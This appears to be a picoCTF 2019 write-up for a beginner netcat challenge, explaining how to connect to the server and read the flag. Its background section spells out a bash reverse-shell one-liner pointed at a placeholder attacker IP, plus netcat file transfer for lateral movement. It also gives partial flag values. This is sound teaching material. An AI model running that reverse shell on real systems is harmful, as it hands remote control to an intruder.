what's a net cat? picoCTF 2019 Solution

Published: April 2, 2026

Description

Using netcat (nc) is going to be pretty important. Can you connect to the server at 2019shell1.picoctf.com port 4158 to get the flag?

Remote

Ensure netcat (nc) is installed on your system.

Connect to the challenge server.

bash
nc 2019shell1.picoctf.com 4158

Solution

Want to try it yourself first?

The guided walkthrough reveals hints one step at a time.

Walk me through it
  1. Step 1
    Connect and read the flag
    Observation
    I noticed the challenge description gave a specific hostname and port and asked to 'connect' to get the flag, which suggested that a raw TCP connection with netcat would be the entire solution since the server simply sends the flag on connect.
    Connecting with nc opens a raw TCP socket to the server. This particular server prints the flag the moment you connect and then closes the connection - no input required.
    bash
    nc 2019shell1.picoctf.com 4158

    Expected output

    picoCTF{...}
    What didn't work first

    Tried: Using curl instead of nc to connect to the server

    curl is an HTTP client and expects an HTTP response with status codes and headers. This server speaks raw TCP, not HTTP, so curl either prints a protocol error or hangs waiting for a valid HTTP response. nc connects at the raw socket layer and prints whatever bytes the server sends, which is what this challenge requires.

    Tried: Adding the -u flag to use UDP instead of TCP

    nc -u switches to UDP, which is connectionless, so no TCP handshake occurs and the server never registers a client connection. The server running on port 4158 listens on TCP only and will not respond to UDP packets. Dropping the -u flag and using plain nc with TCP is the correct approach.

    Learn more

    netcat (nc) is a networking utility that reads from and writes to network connections using TCP or UDP. It opens a raw socket connection to the target host and port, then bridges stdin/stdout to the socket - anything typed goes to the server, and anything the server sends is printed to the terminal. It is called the "Swiss army knife" of networking tools.

    In CTF competitions, nc is used constantly: connecting to remote challenge servers that run custom binaries, interacting with TCP-based puzzles, and piping exploit scripts to remote services. The basic syntax is always nc hostname port. For TLS/SSL connections, use openssl s_client -connect hostname:port instead.

    netcat is available on virtually every Unix-like system. On Windows, ncat (from Nmap) or nc64.exe serve the same purpose. Common netcat variants include the traditional BSD netcat, OpenBSD netcat (which supports more features), and GNU netcat. The -v flag adds verbose connection output; -n skips DNS resolution; -z scans for open ports without sending data (useful for port scanning).

    • nc host port - connect to host:port (client mode)
    • nc -l port - listen for incoming connections (server mode)
    • nc -u host port - use UDP instead of TCP
    • echo 'data' | nc host port - send data and exit

    netcat as a file transfer tool: because netcat simply pipes bytes between stdin/stdout and a network socket, it can transfer any file. On the receiving end: nc -l 4444 > received_file. On the sending end: nc host 4444 < file_to_send. This raw transfer has no authentication, encryption, or integrity checking, but it is fast and requires no additional software. In CTF challenges involving pivoting or lateral movement, netcat-based file transfer is a quick way to move tools and output between machines.

    Reverse shells with netcat: one of the most important uses of netcat in penetration testing and CTF exploitation is establishing a reverse shell. If you have code execution on a target but cannot bind a port (due to firewall rules blocking inbound traffic), you can have the target connect back to your machine. On the attacker's machine: nc -l -p 4444. On the target (executed via a vulnerability): bash -i >& /dev/tcp/attacker_ip/4444 0>&1. The target initiates the outbound connection, the attacker's nc receives it, and both ends of the shell session are connected. Understanding this technique is fundamental to post-exploitation and CTF pwn challenges.

    pwntools as an upgrade over raw netcat: for complex CTF binary exploitation challenges where you need to parse binary output, send exact byte sequences, and handle timing precisely, the Python library pwntools is the standard tool. It provides remote('host', port) for network connections and process('./binary') for local processes, with methods like recv(), sendline(), recvuntil(), and interactive() that map directly to the kind of interaction netcat provides but with programmatic control. Every CTF pwner eventually graduates from manual netcat sessions to scripted pwntools exploits.

Flag

Reveal flag

picoCTF{nEtCat_Mast3ry_...}

Per-instance flag. Multiple hash suffixes confirmed across writeups (628e0244, 700da9c7, d0c64587). Prefix picoCTF{nEtCat_Mast3ry_} is consistent.

Key takeaway

Netcat bridges stdin and stdout to a raw TCP or UDP socket, making it the universal tool for interacting with any text-based network service without a dedicated client. Every CTF binary exploitation challenge ultimately requires sending and receiving bytes over a socket, and netcat teaches that mental model before more powerful tools like pwntools take over. The same primitive, a raw socket connection, underlies reverse shells, port forwarding, and banner grabbing in real penetration testing engagements.

Related reading

Want more picoCTF 2019 writeups?

Useful tools for General Skills

What to try next